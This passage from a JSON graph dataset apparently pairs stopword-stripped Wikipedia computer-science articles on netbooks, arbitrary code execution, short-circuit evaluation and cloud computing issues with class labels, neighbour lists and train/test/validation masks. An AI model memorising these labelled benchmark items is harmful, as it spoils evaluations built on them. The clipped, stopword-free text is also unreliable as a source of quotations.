needs caused increased interest resource-efficient applications google chrome forced microsoft extend availability windows xp secure market share estimated almost thirty times netbooks sold 2008 11.4 million 70 europe 2007 400,000 trend reinforced rise web-based applications well mobile networking according wired magazine netbooks evolving super-portable laptops professionals ongoing recession also helping growing sales netbooks australia new south wales department education training partnership lenovo provided year 9 high school students government high schools lenovo s10e netbooks 2009 lenovo mini 10 netbooks 2010 lenovo edge 11 netbooks 2011 modified lenovo x130e netbook 2012 preloaded software including microsoft office adobe systems creative suite 4 provided prime minister kevin rudd digital education revolution der netbooks ran windows 7 enterprise netbooks secured computrace lojack laptops police use track device lost stolen nsw det retains ownership netbooks student graduates year 12 student keep government trinidad tobago—prime minister kamla persad bisseser—is also providing hp laptops form 1 students 11-year-olds police trackable software greece provided 13-year-old students middle school gymnasium freshmen teachers netbooks 2009 digital classroom initiative students given one unique coupon redeemed netbook choice €450 price ceiling participating shops throughout country netbooks came bundled localised versions either windows xp higher open source e.g linux operating systems wired wireless networking functionality antivirus protection preactivated parental controls educational software package microsoft intel tried cement netbooks low end market protect mainstream notebook pc sales get lower margins low-cost models companies limited specifications netbooks despite original equipment manufacturers announced higher-end netbooks models march 2009 ending 2008 report typical netbook featured weight screen wireless internet connectivity linux windows xp intel atom processor cost less 400 us mid-2009 newspaper article said typical netbook 300 us screen peaked 20 portable computer market netbooks started slightly lose market share within category early 2010 coinciding appearance success ipad technology commentator ross rubin argued two half years later engadget netbooks never got respect steve jobs rebuked netbook ipad introduction ipad owes bit debt little laptops netbook demonstrated potential inexpensive portable second computing device screen size 10 inches intended primarily media consumption light productivity although manufacturers directly blamed competition ipad analysts pointed larger fully fledged laptops entered price range netbooks time 11.6-inch macbook air introduced late 2010 compared favorably many netbooks terms processing power also ergonomics 2.3 pounds lighter 10-inch netbooks owing part integration flash storage chips main logic board described superlative netbook least netbook several technology commentators even though apple never referred sometimes describing it—in words steve jobs—as third kind notebook entry level model msrp 999 costing significantly average netbook much three four times 2011 tablet sales overtook netbooks first time 2012 netbook sales fell 25 percent year-on-year sustained decline since 2010 pronounced united states western europe latin america still showing modest growth december 2011 dell announced exiting netbook market may 2012 toshiba announced least united states august 2012 article john c. dvorak pc magazine claimed term netbook nearly gone lexicon already superseded market place largely powerful macbook air inspired ultrabook—described netbook steroids —and lesser extent tablets september 2012 asus acer msi announced stop manufacturing 10-inch netbooks simultaneously asus announced would stop developing eee pc products instead focusing mixed tablet-netbook transformer line introduction chromebooks major manufacturers produced new laptops segment market netbooks serviced chromebooks variation network computer concept form netbook require internet connections full functionality chromebooks became top selling laptops 2014 threat google chrome os based chromebooks prompted microsoft revive revamp netbooks windows 8.1 bing hp re-entered non-chromebook netbook market stream 11 2014 1996 psion started applying trademarks line netbook products later released 1999. international trademarks issued including models failed gain popularity discontinued except providing accessories maintenance support existing users similar marks recently rejected uspto citing likelihood confusion section 2 despite expert analysis mark probably generic psion teklogix issued cease desist letters 23 december 2008 heavily criticised prompting formation save netbooks grassroots campaign worked reverse google adwords ban cancel trademark encourage continued generic use term preparing petition cancellation revealed dell submitted one day basis abandonment genericness fraud later revealed psion counter-suit intel filed 27 february 2009 also revealed around time intel also sued psion teklogix us canada psion uk federal court similar grounds addition seeking cancellation trademark intel sought order enjoining psion asserting trademark rights term netbook declarative judgment regarding use term attorneys fees costs disbursements relief court deems proper june 2 2009 psion announced suit settled court psion statement said company withdrawing trademark registrations term netbook psion agreed waive rights third parties respect past current future use term netbooks typically less powerful hardware larger laptop computers include optical disc drive larger laptops often netbooks even conventional hard drive netbooks use solid-state storage devices instead require less power faster lighter generally shock-resistant much less storage capacity 32 64 128 gb compared 100 gb 2 tb mechanical hard drives typical many notebooks/laptop computers netbooks market today support wi-fi wireless networking many used mobile telephone networks data capability example 3g mobile data plans supplied contract way mobile telephones also include ethernet and/or modem ports broadband dial-up internet access respectively remains seen whether intel new silvermont architecture released 2013 revive sales new chips offer far greater power using wattage netbooks asus benq dell toshiba acer use intel atom notebook processor typically n270 1.6 ghz also available n280 1.66 ghz replaced n450 series graphics memory controller integrated chip early 2010 running 1.66 ghz x86-compatible via technologies c7 processor also powering netbooks many different manufacturers like hp samsung via also designed nano new x86-64-compatible architecture targeting lower priced mobile applications like netbooks currently one netbook uses nano samsung nc20 low cost netbooks use system-on-a-chip vortex86 processor meant embedded systems windows compatible low performance 2011 amd launched fusion netbook processors included asus eee pc 1015t many others although officially sanctioned amd role 1.2 ghz athlon 64 model l110 processor dissipating 13 w used least one company—gateway—to power 11.6-inch portable 1366x768 screen resolution described netbook press launched mid-2009 399 united states lt31 met reviewers approval performance generally recognized faster contemporary atom-based products price range considerably shorter battery life still falling short intel core 2 ulv product line powering expensive small-factor offerings 11.6 inch macbook air debuted late 2010 1.4 ghz core 2 duo processor 10 w part 1366x768 display resolution entry level model priced 999 1.6 ghz available upgrade put much closer fully modern laptop small-but-crippled netbooks one reviewer described mercedes benz netbooks september 2011 pc magazine buyer guide netbooks observed oversized netbooks 11.6 inch screens appeared market including hp pavilion dm1z msrp 449 lenovo thinkpad x100e msrp 550 using amd fusion e-350 processor 18 w part although includes gpu described faster given atom processor definition netbooks accommodate processors little processing power comparison common dual-core core 2 duo t5600 1.83 ghz 2 mb l2 cache used low-end laptops passmark score 1000 points following table shows benchmarks common netbook cpus arm holdings designs licenses microprocessor technology relatively low power requirements low cost would constitute ideal basis netbooks particular recent arm cortex-a9 mpcore series processor cores touted arm alternative platform x86 netbooks june 2009 nvidia announced dozen mobile internet devices running arm-based tegra soc netbooks arm-based products advertised smartbooks particularly qualcomm smartbooks promised deliver features including always all-day battery life 3g connectivity gps typically found smartphones laptop-style body screen size 5 10 inches qwerty keyboard systems run traditional x86 versions microsoft windows rather custom linux operating systems google android chrome os end products ever shipped market branding like hp-compaq airlife toshiba ac100 sold dynabook az japan efika mx devices like ac100 hampered sold phone-oriented operating system like android end 2010 qualcomm ceo paul jacobs admitted tablet computers ipad already occupied niche smartbook name dropped netbooks use mips architecture-compatible processors include skytone alpha-400 based ingenic system chip emtec gdium netbook uses 64-bit loongson processor capable 400 million instructions per second systems relatively inexpensive processing power current mips implementations usually compares unfavorably x86-implementations found current netbooks microsoft announced april 8 2008 despite impending end retail availability operating system june would continue license low-cost copies windows xp home edition oems october 2010 one year release windows 7 defined ultra low-cost personal computers —a definition carrying restrictions screen size processing power move served primarily counter use low-cost linux distributions netbooks create new market segment windows devices whilst ensuring devices cannibalize sales higher-end pcs running windows vista 2009 90 96 claimed microsoft february 2009 netbooks united states estimated ship windows xp windows 7 microsoft introduced new stripped-down edition intended netbooks known starter exclusively oems comparison home premium starter reduced multimedia functionality allow users change desktop wallpaper theme disables aero glass theme support multiple monitors windows 8 ploy counter chrome os-based netbooks low-end android tablets microsoft began offer no-cost windows licenses oems devices screens smaller 9 inches size additionally microsoft began offer low-cost licenses variant operating system set use microsoft bing search engine default windows ce also used netbook due reduced feature set google android software platform designed mobile telephone handsets demonstrated asus eee pc version linux operating system contains policies mobile internet devices including original asus eee pc 701 asus allocated engineers develop android-based netbook may 2009 contractor dell announced porting adobe flash lite android dell netbooks acer announced android netbooks available q3/2009 july 2009 new project android-x86 created provide open source solution android x86 platform especially netbooks google since 2011 marketed netbook-specific platform known chrome os google made efforts provide access android ecosystem within chrome os including 2016 introduction google play store compatibility layer android applications platform 2011 google introduced chrome os linux-based operating system designed particularly netbook-like devices marketed chromebooks platform designed leverage online services cloud computing namesake chrome web browser shell—so much operating system initially used full screen web browser window interface contained limited offline functionality later versions chrome os introduced traditional desktop interface platform allowing native packaged software written html javascript css developed platform netbooks sparked development several linux variants completely new distributions optimized small screen use limited processing power atom arm processors typically power netbooks examples include ubuntu netbook edition easypeasy joli os meego freebsd netbsd openbsd darwin joli os meego purport social oriented social networking operating systems rather traditional office work production operating systems since 2010 major netbook manufacturers longer install support linux united states reason change stance unclear although coincides availability 'netbook version windows xp later windows 7 starter strong marketing push adoption os netbook market however companies targeting niche markets system76 zareason continue pre-install linux devices sell cloud operating system attempts capitalize minimalist aspect netbooks user interface limited browser application mac os x demonstrated running various netbooks result osx86 project although violation operating system end-user license agreement apple complained sites hosting information install os x onto non-apple hardware including wired youtube reacted removed content response one article nicknamed netbook running os x hackintosh macbook air considered expensive netbook june 2009 npd study found 60 netbook buyers never take netbooks house special children editions netbooks released disney branding low cost less risk lack dvd player less break smaller keyboards closer children hand sizes viewed significant advantages target market principal objection netbooks context lack good video performance streaming online video current netbooks lack speed even simple games adults browsing text content less dependent video content small children read netbooks growing trend education several reasons need prepare children 21st-century lifestyles combined hundreds new educational tools found online growing emphasis student centered learning three biggest contributing factors rising use netbook technology schools dell one first mass-produce ruggedised netbook education sector rubber outlay touchscreen network activity light show teacher netbook online netbooks offer several distinct advantages educational settings first compact size weight make easy fit student work areas similarly small size make netbooks easier transport heavier larger sized traditional laptops addition prices ranging 200– 600 mean affordability netbooks relief school budget makers despite small size price netbooks fully capable accomplishing school-related tasks including word processing presentations access internet multimedia playback photo management",
    "neighbors": [
      3586,
      1032,
      4623,
      10768,
      4124,
      10780,
      10787,
      9766,
      5159,
      3121,
      1083,
      7745,
      7234,
      10820,
      2635,
      7243,
      7248,
      3162,
      1121,
      4194,
      5732,
      3685,
      9337,
      2170,
      9851,
      4228,
      4236,
      6797,
      7822,
      10893,
      6804,
      7325,
      6307,
      7352,
      9913,
      4289,
      1224,
      1736,
      3281,
      3293,
      6367,
      1761,
      3304,
      2282,
      3819,
      5356,
      9970,
      4348,
      253,
      8446,
      6913,
      7938,
      5384,
      5386,
      2328,
      4377,
      8986,
      3883,
      6444,
      7983,
      816,
      8495,
      823,
      3903,
      321,
      1348,
      5444,
      8520,
      4429,
      2383,
      1362,
      10090,
      6508,
      8044,
      10606,
      1400,
      5499,
      8573,
      11646,
      3462,
      6539,
      911,
      1935,
      8592,
      2965,
      10646,
      426,
      10675,
      2496,
      1480,
      6090,
      3537,
      9682,
      467,
      9173,
      6618,
      5088,
      5606,
      7660,
      7151,
      10223,
      6641,
      499,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 5682,
    "label": 4,
    "text": "Arbitrary_code_execution:arbitrary code execution computer security arbitrary code execution ace used describe attacker ability execute arbitrary commands code target machine target process arbitrary code execution vulnerability security flaw software hardware allowing arbitrary code execution program designed exploit vulnerability called arbitrary code execution exploit ability trigger arbitrary code execution network especially via wide-area network internet often referred remote code execution rce number classes vulnerability lead attacker ability execute arbitrary commands code arbitrary code execution commonly achieved control instruction pointer jump branch running process instruction pointer points next instruction process executed control value instruction pointer therefore gives control instruction executed next order execute arbitrary code many exploits inject code process example sending input gets stored input buffer ram use vulnerability change instruction pointer point injected code injected code automatically get executed type attack exploits fact computers use von neumann architecture make general distinction code data malicious code camouflaged harmless input data many newer cpus mechanisms make harder no-execute bit arbitrary code execution exploit give attacker privileges target process vulnerable example exploiting flaw web browser attacker could act user performing actions modifying personal computer files accessing banking information would able perform system-level actions unless user question also access work around attacker execute arbitrary code target often attempt privilege escalation exploit order gain additional control may involve kernel account administrator system root without enhanced control exploits potential severe damage turn computer zombie privilege escalation helps hiding attack legitimate administrator system combining exploits way called exploit chain arbitrary remote code execution privilege escalation vulnerability widely deployed software considered severe class computer vulnerability retrogaming hobbyists managed find vulnerabilities classic video games allow execute arbitrary code usually using precise sequence button inputs order cause buffer overflow allowing write protected memory awesome games done quick 2014 group speedrunning enthusiasts managed code run primitive versions games pong flappy bird copy super mario world utilizing buffer overflow write arbitrary code memory june 12 2018 security researcher jean-yves avenard mozilla discovered ace vulnerability windows 10 may 1 2018 security researcher discovered ace vulnerability 7-zip file archiver php subject numerous ace vulnerabilities",
    "neighbors": [
      5636,
      1803,
      6797,
      4240,
      3473,
      894,
      11537,
      6550,
      537,
      2717,
      161,
      3234,
      2467,
      2470,
      6950,
      10412,
      10796,
      10492,
      950,
      1474,
      8644,
      2758,
      4423,
      2383,
      3922,
      2262,
      3286,
      5465,
      9953,
      10338,
      2152,
      8946,
      9590,
      10747,
      7804,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5683,
    "label": 9,
    "text": "Joe_Stoy:joe stoy joseph e. joe stoy british computer scientist originally studied physics oxford university early career 1970s worked denotational semantics christopher strachey programming research group oxford university computing laboratory oxford university department computer science fellow balliol college oxford also spent time mit united states 2003 co-founded bluespec inc. book denotational semantics scott-strachey approach programming language semantics mit press 1977 classic text stoy married gabrielle stoy mathematician fellow lady margaret hall oxford",
    "neighbors": [
      5456
    ],
    "mask": "None"
  },
  {
    "node_id": 5684,
    "label": 9,
    "text": "Short-circuit_evaluation:short-circuit evaluation short-circuit evaluation minimal evaluation mccarthy evaluation john mccarthy semantics boolean operators programming languages second argument executed evaluated first argument suffice determine value expression first argument codice_1 function evaluates codice_2 overall value must codice_2 first argument codice_4 function evaluates codice_5 overall value must codice_5 programming languages lisp perl haskell lazy evaluation usual boolean operators short-circuit others ada java delphi short-circuit standard boolean operators available boolean operations like exclusive xor possible short-circuit operands always required determine result short-circuit expression codice_7 equivalent conditional expression codice_8 expression codice_9 equivalent codice_10 short-circuit operators effect control structures rather simple arithmetic operators strict imperative language terms notably c c++ side effects important short-circuit operators introduce sequence point – completely evaluate first argument including side effects optionally processing second argument algol 68 used proceduring achieve user-defined short-circuit operators procedures loosely typed languages two truth-values codice_11 codice_12 short-circuit operators may return last evaluated subexpression expression codice_7 equivalent codice_14 expression codice_9 equivalent codice_16 without evaluating codice_17 twice called last value table languages use lazy evaluation default like haskell functions effectively short-circuit special short-circuit operators needed use short-circuit operators criticized problematic abap distinct boolean type usual example using c-based language consider following example example short-circuit evaluation guarantees codice_26 never called codice_27 evaluates false feature permits two useful programming constructs illustrated following c snippet minimal evaluation prevents null pointer dereference excess memory fetches despite benefits minimal evaluation may cause problems programmers realize forget happening example code codice_26 supposed perform required operation regardless whether codice_29 executed allocating system resources codice_30 evaluates false codice_26 execute could cause problems programming languages java two operators one employs minimal evaluation one avoid problem problems unperformed side effect statements easily solved proper programming style i.e. using side effects boolean statements using values side effects evaluations tends generally make code opaque error-prone since minimal evaluation part operator semantic definition optional optimization many coding patterns come rely succinct idiomatic conditional construct examples include perl idioms bash unix shell script idioms short-circuiting lead errors branch prediction modern central processing units cpus dramatically reduce performance notable example highly optimized ray axis aligned box intersection code ray tracing compilers detect cases emit faster code programming language semantics may constrain optimizations",
    "neighbors": [
      3462,
      8582,
      6536,
      8082,
      8722,
      3736,
      4507,
      1435,
      9245,
      6558,
      5663,
      7326,
      11555,
      3876,
      7076,
      10616,
      11688,
      4777,
      428,
      5165,
      5677,
      10043,
      2620,
      6718,
      4799,
      8644,
      8262,
      5703,
      3529,
      5833,
      1611,
      8524,
      847,
      7889,
      3414,
      8289,
      10083,
      6502,
      10470,
      8554,
      1776,
      3960,
      10618,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5685,
    "label": 5,
    "text": "YPOPs!:ypops ypops previously known yahoopops open-source software provides pop3 smtp access yahoo mail available microsoft windows linux solaris mac platforms software released 2006 latest update 2009",
    "neighbors": [
      5612,
      6797,
      7983,
      9909,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5686,
    "label": 3,
    "text": "INMOS_G364_framebuffer:inmos g364 framebuffer g364 framebuffer line graphics adapters using sgs thomson inmos g364 chipset produced inmos known transputer eventually acquired sgs thomson incorporated stmicroelectronics early 1990s g364 included ramdac 64-bit interface vram graphical memory implement framebuffer include hardware-based graphical acceleration hardware cursor function g364 largely similar design functionality g300 framebuffer 64-bit vram interface instead slower 32-bit interface lower-price g300 inmos g364 quite similar g332 found personal decstation although g364 capable providing comparatively high resolution output 1600×1200 pixels 8 bits-per-pixel many cases typically achieved unix workstations sun microsystems sgi popular chipset personal computer manufacturers early 1990s adopted major workstation manufacturers g364 framebuffer found use after-market commodore amiga graphics card primary graphics system sold mips magnum 4000 series mips-based windows nt workstations amiga cards based g364",
    "neighbors": [
      9665,
      7234,
      10051,
      10658,
      9477,
      6854,
      5736,
      11405,
      7215,
      8976,
      5873,
      5492,
      6879
    ],
    "mask": "Test"
  },
  {
    "node_id": 5687,
    "label": 8,
    "text": "Comunes_Collective:comunes collective comunes non-profit organization stated aims encouraging commons facilitating grassroots work free/libre web tools previously known ourproject.org collective established legal entity 2009 forming comunes nowadays serves umbrella organization several projects related commons among comunes objectives provide legal protection member projects together technical infrastructure claims inspired software public interest organization provides similar protection free software projects comunes member projects must focus encouraging protection expansion commons comunes manifesto shows view social movements nodes social network analysing problems ecosystem proposing comunes web tools diminishing ourproject.org web-based collaborative free content repository acts central location offering web space tools projects topic focusing free culture free knowledge aims extend ideas methodology free software social areas free culture general thus provides multiple web services hosting mailing lists wiki ftp forums… online community social/cultural/artistic/educational projects long share contents creative commons licenses free/libre licenses active since 2002 nowadays hosts 1200 projects services receive 1,000,000 monthly visits kune software platform federated social networking collaborative work focusing workgroups rather individuals aims allow creation online spaces collaborative work organizations individuals build projects online coordinate common agendas set virtual meetings join organizations similar interests programmed using gwt top xmpp protocol integrating wave-in-a-box licensed affero gpl development since 2007 launched beta production site april 2012 move commons mc web tool initiatives collectives ngos declare visibilize core principles committed idea behind mc follows mechanics creative commons tagging cultural works providing user-friendly bottom-up labelling system initiative four meaningful icons keywords aims boosting visibility diffusion initiatives building network among related initiatives/collectives allowing mutual discovery besides newcomers could easily understand collective approach website discover collectives matching field/location/interests semantic search presented several forums nowadays beta version already organizations using mc badges comunes includes young projects alerta community-driven alert system plantaré community currency seed exchange others comunes developed partnership several organizations",
    "neighbors": [
      2841,
      10242
    ],
    "mask": "Train"
  },
  {
    "node_id": 5688,
    "label": 2,
    "text": "Pungi_(software):pungi software pungi program making spins fedora linux distribution release 7 upwards",
    "neighbors": [
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 5689,
    "label": 4,
    "text": "Cloud_computing_issues:cloud computing issues cloud computing become social phenomenon used people every day every important social phenomenon issues limit widespread adoption present scenario cloud computing seen fast developing area instantly supply extensible services using internet help hardware software virtualization biggest advantage cloud computing flexible lease release resources per requirement user benefits encompass betterment efficiency compensating costs operations curtails high prices hardware software although numerous benefits adopting latest cloud technology still privacy issues involved cloud computing cloud time data outbreak service provider information deleted purposely security issues various kinds related cloud computing falling two broader categories first issues related cloud security cloud providers face like software provided organizations infrastructure service secondly issues related cloud security customers experience organizations store data cloud issues start fact user loses control data stored computer belonging someone else cloud provider happens owner remote servers person organization user interests may point different directions example user may wish information kept private owner remote servers may want take advantage business issues hampering adoption cloud technologies include uncertainties related guaranteed qos provisioning automated management remediation cloud systems many issues relate cloud computing discussed gnu project initiator richard stallman characterized cloud computing raising cost information-ownership concerns oracle founder larry ellison viewed trend cloud computing terms fashion-driven ... complete gibberish however concept cloud computing appeared gain steam 56 major european technology decision-makers seeing cloud priority 2013 2014 cloud budget may reach 30 overall budget according techinsights report 2013 cloud succeeds based survey cloud implementations generally meet exceed expectations across major service models infrastructure service iaas platform service paas software service saas several deterrents widespread adoption cloud computing remain include cloud offers many strong points infrastructure flexibility faster deployment applications data cost control adaptation cloud resources real needs improved productivity etc cloud market early 2010s especially private clouds dominated software services saas mode iaas infrastructure paas public cloud lag comparison increased use cloud computing services gmail google docs pressed issue privacy concerns cloud computing services utmost importance provider services lie position greater use cloud computing services given access plethora data access immense risk data disclosed either accidentally deliberately privacy companies compromised information sent cloud service provider privacy advocates criticized cloud model giving hosting companies greater ease control—and thus monitor will—communication host company end user access user data without permission instances secret nsa program working verizon recorded 10 million telephone calls american citizens causes uncertainty among privacy advocates greater powers gives telecommunication companies monitor user activity cloud service provider csp complicate data privacy extent virtualization virtual machines cloud storage used implement cloud service csp operations customer tenant data may remain system data center even within provider cloud lead legal concerns jurisdiction efforts us-eu safe harbor harmonise legal environment providers amazon still cater major markets typically united states european union deploying local infrastructure allowing customers select regions availability zones cloud computing poses privacy concerns service provider access data cloud time could accidentally deliberately alter even delete information becomes major concern service providers employ administrators leave room potential unwanted disclosure information cloud sometimes technical issues like servers might time becomes difficult gain access resources time anywhere e.g non-availability services due denial service attack use technique cloud computing always strong internet connection without would able take advantage cloud computing issue related cloud computing consumes great power physical devices smartphone many cloud providers share information third parties necessary purposes law order even without warrant permitted privacy policies users agree start using cloud services life-threatening situations time wait police issue warrant many cloud providers share information immediately police situations dropbox privacy policy states may share information discussed … law order may disclose information third parties determine disclosure reasonably necessary comply law b protect person death serious bodily injury c prevent fraud abuse dropbox users protect dropbox property rights sydney morning herald reported mosman bomb hoax life-threatening situation whether nsw police needed warrant access information likely byrne said depended process taken gmail set process terms legal disclosure guidelines done search warrant ... exceptions apply different parts world different service providers example facebook generally provides exception emergency life threatening situations signed law enforcement another computer forensic expert it4ensics works large corporations dealing matters like internal fraud scott lasak said police would contact google police fbi background google would assist whether need go warrants sort thing 'm sure even ip address might even need warrant something like police background nsw police would comment whether received help google search giant also declined comment instead offering standard statement cooperated law enforcement spokesman online users lobby group electronic frontiers australia stephen collins said google likely handed need information basis probable cause warrant said perfectly legitimate also said “ happens relative frequency … things rarely used australia trivial malevolent purposes. ” solutions privacy cloud computing include policy legislation well end users choices data stored cloud service provider needs establish clear relevant policies describe data cloud user accessed used cloud service users encrypt data processed stored within cloud prevent unauthorized access cryptographic encryption mechanisms certainly best options addition authentication integrity protection mechanisms ensure data goes customer wants go modified transit strong authentication mandatory requirement cloud deployment user authentication primary basis access control specially cloud environment authentication access control important ever since cloud data publicly accessible biometric identification technologies linking user ’ biometrics information data available technologies use searchable encryption techniques perform identification encrypted domain cloud providers potential attackers gain access sensitive data even contents individual queries comply regulations including fisma hipaa sox united states data protection directive eu credit card industry pci dss users may adopt community hybrid deployment modes typically expensive may offer restricted benefits google able manage meet additional government policy requirements beyond fisma rackspace cloud qubespace able claim pci compliance many providers also obtain audit criticised grounds hand-picked set goals standards determined auditor auditee often disclosed vary widely providers typically make information available request non-disclosure agreement customers eu contracting cloud providers outside eu/eea adhere eu regulations export personal data multitude laws regulations forced specific compliance requirements onto many companies collect generate store data policies may dictate wide array data storage policies long information must retained process used deleting data even certain recovery plans examples compliance laws regulations virtualized cloud computing environment customers may never know exactly data stored fact data may stored across multiple data centers effort improve reliability increase performance provide redundancies geographic dispersion may make difficult ascertain legal jurisdiction disputes arise u.s. federal agencies directed office management budget use process called fedramp federal risk authorization management program assess authorize cloud products services federal cio steven vanroekel issued memorandum federal agency chief information officers december 8 2011 defining federal agencies use fedramp fedramp consists subset nist special publication 800-53 security controls specifically selected provide protection cloud environments subset defined fips 199 low categorization fips 199 moderate categorization fedramp program also established joint accreditation board jab consisting chief information officers dod dhs gsa jab responsible establishing accreditation standards 3rd party organizations perform assessments cloud solutions jab also reviews authorization packages may grant provisional authorization operate federal agency consuming service still final responsibility final authority operate changes landscape computing certain legal issues arise cloud computing including trademark infringement security concerns sharing proprietary data resources electronic frontier foundation criticized united states government megaupload seizure process considering people lose property rights storing data cloud computing service one important often mentioned problem cloud computing problem possession data cloud company possessor data possessor certain legal rights cloud company custodian data different set rights would apply next problem legalities cloud computing problem legal ownership data many terms service agreements silent question ownership legal issues confined time period cloud-based application actively used must also consideration happens provider-customer relationship ends cases event addressed application deployed cloud however case provider insolvencies bankruptcy state data may become blurred cloud computing still relatively new standards still developed many cloud platforms services proprietary meaning built specific standards tools protocols developed particular vendor particular cloud offering make migrating proprietary cloud platform prohibitively complicated expensive three types vendor lock-in occur cloud computing heterogeneous cloud computing described type cloud environment prevents vendor lock-in aligns enterprise data centers operating hybrid cloud models absence vendor lock-in lets cloud administrators select choice hypervisors specific tasks deploy virtualized infrastructures enterprises without need consider flavor hypervisor enterprise heterogeneous cloud considered one includes on-premises private clouds public clouds software-as-a-service clouds heterogeneous clouds work environments virtualized traditional data centers heterogeneous clouds also allow use piece parts hypervisors servers storage multiple vendors cloud piece parts cloud storage systems offer apis often incompatible result complicated migration backends makes difficult integrate data spread across various locations described problem vendor lock-in solution clouds adopt common standards heterogeneous cloud computing differs homogeneous clouds described using consistent building blocks supplied single vendor intel general manager high-density computing jason waxman quoted saying homogeneous system 15,000 servers would cost 6 million capital expenditure use 1 megawatt power open-source software provided foundation many cloud computing implementations prominent examples hadoop framework vmware cloud foundry november 2007 free software foundation released affero general public license version gplv3 intended close perceived legal loophole associated free software designed run network cloud providers expose apis typically well documented often creative commons license also unique implementation thus interoperable vendors adopted others apis number open standards development view delivering interoperability portability november 2012 open standard broadest industry support probably openstack founded 2010 nasa rackspace governed openstack foundation openstack supporters include amd intel canonical suse linux red hat cisco dell hp ibm yahoo huawei vmware security generally desired state free harm anything compromises state entity well defined information security condition information asset protected confidentiality quality state free unauthorised insecure disclosure contrary defined access rights listed access control list matrix integrity quality state whole/ complete original uncorrupted functionally proven hash integrity values availability desired state information resource accessible authorised parties listed access control list matrix desired state right time security important domain far cloud computing concerned number issues addressed cloud perfectly secure condition doubt ever achieved martin muduva 2015 cloud computing achieving increased popularity concerns voiced security issues introduced adoption new model effectiveness efficiency traditional protection mechanisms reconsidered characteristics innovative deployment model differ widely traditional architectures alternative perspective topic cloud security another although quite broad case applied security similar security principles apply shared multi-user mainframe security models apply cloud security relative security cloud computing services contentious issue may delaying adoption physical control private cloud equipment secure equipment site someone else control physical control ability visually inspect data links access ports required order ensure data links compromised issues barring adoption cloud computing due large part private public sectors unease surrounding external management security-based services nature cloud computing-based services private public promote external management provided services delivers great incentive cloud computing service providers prioritize building maintaining strong management secure services security issues categorised sensitive data access data segregation privacy bug exploitation recovery accountability malicious insiders management console security account control multi-tenancy issues solutions various cloud security issues vary cryptography particularly public key infrastructure pki use multiple cloud providers standardisation apis improving virtual machine support legal support cloud computing offers many benefits vulnerable threats cloud computing uses increase likely criminals find new ways exploit system vulnerabilities many underlying challenges risks cloud computing increase threat data compromise mitigate threat cloud computing stakeholders invest heavily risk assessment ensure system encrypts protect data establishes trusted foundation secure platform infrastructure builds higher assurance auditing strengthen compliance security concerns must addressed maintain trust cloud computing technology data breach big concern cloud computing compromised server could significantly harm users well cloud providers variety information could stolen include credit card social security numbers addresses personal messages u.s. requires cloud providers notify customers breaches notified customers worry identity theft fraud providers deal federal investigations lawsuits reputational damage customer lawsuits settlements resulted 1 billion losses cloud providers cloud provider may shut without warning instance anki robot company suddenly went bankrupt 2019 making 1.5 million robots unresponsive voice command although cloud computing often assumed form green computing currently way measure green computers primary environmental problem associated cloud energy use phil radford greenpeace said “ concerned new explosion electricity use could lock us old polluting energy sources instead clean energy available today. ” greenpeace ranks energy usage top ten big brands cloud computing successfully urged several companies switch clean energy thursday december 15 2011 greenpeace facebook announced together facebook would shift use clean renewable energy power operations soon thereafter apple agreed make data centers ‘ coal free ’ end 2013 doubled amount solar energy powering maiden nc data center following suit salesforce agreed shift 100 clean energy 2020 citing servers effects environmental effects cloud computing areas climate favors natural cooling renewable electricity readily available environmental effects moderate holds true traditional data centers thus countries favorable conditions finland sweden switzerland trying attract cloud computing data centers energy efficiency cloud computing result energy-aware scheduling server consolidation however case distributed clouds data centers different sources energy including renewable energy use energy efficiency reduction could result significant carbon footprint reduction privately purchased hardware customers purchase services cloud computing nefarious purposes includes password cracking launching attacks using purchased services 2009 banking trojan illegally used popular amazon service command control channel issued software updates malicious instructions pcs infected malware introduction cloud computing requires appropriate governance model ensure secured computing environment comply relevant organizational information technology policies organizations need set capabilities essential effectively implementing managing cloud services including demand management relationship management data security management application lifecycle management risk compliance management danger lies explosion companies joining growth cloud computing becoming providers however many infrastructural logistical concerns regarding operation cloud computing businesses still unknown over-saturation may ramifications industry whole increased use cloud computing could lead reduction demand high storage capacity consumer end devices due cheaper low storage devices stream content via cloud becoming popular wired article jake gardner explains unregulated usage beneficial tech moguls like amazon anonymous nature cost consumption cloud usage makes difficult business evaluate incorporate business plans outside information technology software industry term cloud found reference wide range services fall category cloud computing others cloud often used refer product service discovered accessed paid internet necessarily computing resource examples service sometimes referred cloud include limited crowd sourcing cloud printing crowd funding cloud manufacturing due multi-tenant nature resource sharing cloud computing must also deal noisy neighbor effect effect essence indicates shared infrastructure activity virtual machine neighboring core physical host may lead increased performance degradation vms physical host due issues e.g cache contamination due fact neighboring vms may activated deactivated arbitrary times result increased variation actual performance cloud resources effect seems dependent nature applications run inside vms also factors scheduling parameters careful selection may lead optimized assignment order minimize phenomenon also led difficulties comparing various cloud providers cost performance using traditional benchmarks service application performance time period location benchmark performed result widely varied results observation led turn research efforts make cloud computing applications intrinsically aware changes infrastructure application automatically adapt avoid failure philosopher slavoj žižek points although cloud computing enhances content accessibility access increasingly grounded virtually monopolistic privatization cloud provides access according access necessarily mediated handful companies ensures progressive privatization global cyberspace žižek criticizes argument purported supporters cloud computing phenomenon part natural evolution internet sustaining quasi-monopolies set prices also filter software provide give universality particular twist depending commercial ideological interests",
    "neighbors": [
      2818,
      4194,
      1400,
      10756,
      5384,
      6153,
      3819,
      3791,
      4367,
      9455,
      467,
      662,
      1048,
      3323,
      2558,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 5690,
    "label": 4,
    "text": "Elizabeth_France:elizabeth france elizabeth irene france leicester born 1 february 1950 former chair office legal complaints appointed february 2009 chair 2014 steve green became chair 1994 2002 data protection registrar information commissioner 2002 2009 chief ombudsman chief executive ombudsman services ltd. elizabeth france chair uk public affairs council member british transport police authority vice president aberystwyth university member general assembly manchester university elizabeth france also chair security industry authority role took january 2014 elizabeth read politics aberystwyth 1968- 1971 prior appointment 1994 data protection registrar worked home office awarded cbe 2002 services data protection holds honorary doctorate degrees",
    "neighbors": [
      4037
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5691,
    "label": 1,
